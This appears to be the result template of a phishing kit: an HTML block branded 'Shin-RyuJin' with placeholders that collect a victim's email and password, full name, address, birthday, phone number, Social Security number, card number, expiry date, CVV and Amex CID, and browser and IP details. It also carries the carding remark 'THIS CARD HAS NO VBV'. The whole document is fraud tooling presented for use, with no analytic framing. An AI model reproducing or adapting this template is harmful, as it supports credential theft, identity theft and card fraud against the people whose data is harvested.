<div style="width:60%;border:2px solid #333;margin:0 auto;">
    <center><h3 style="font-weight: bold;font-family:monospace;">Shin-RyuJin {app_name}</h3><hr style="width:80%;border:1px solid #111"></center>
<pre style="margin-left:10%">
## ACCOUNT DETAILS ##

 Username          :: {email}
 Password          :: {password}
---------------------------------

## BILLING DETAILS ##

 Fullname          :: {fullname}
 Address           :: {address}
 City              :: {city}
 State             :: {state}
 country           :: {country}
 Zip/Postcode      :: {postcode}
 BirthDay          :: {birthday}
 Phone             :: {phone}
 S S N              :: {ssn}
 ---------------------------------

## CARD DETAILS ##

 Bank              :: {bank}
 Brand - Type      :: {brandtype}
 Level - Country   :: {levelcountry}
 CardHolders       :: {cardholder}
 CardNumber        :: {cardnumber}
 Expired Date      :: {expired}
 Security (CVV)    :: {cvv}
 Amex CID          :: {cid}
 Copy              :: {copy}
 AutoPay           :: {autopay}
---------------------------------

<b>## THIS CARD HAS NO VBV ##</b>

 ## ACCESS INFORMATION ##

 User IP            :: {ip}
 UserAgent          :: {agent}
 Browser            :: {browser}
 Device             :: {device}
 Date               :: {date}
</pre>
</div>

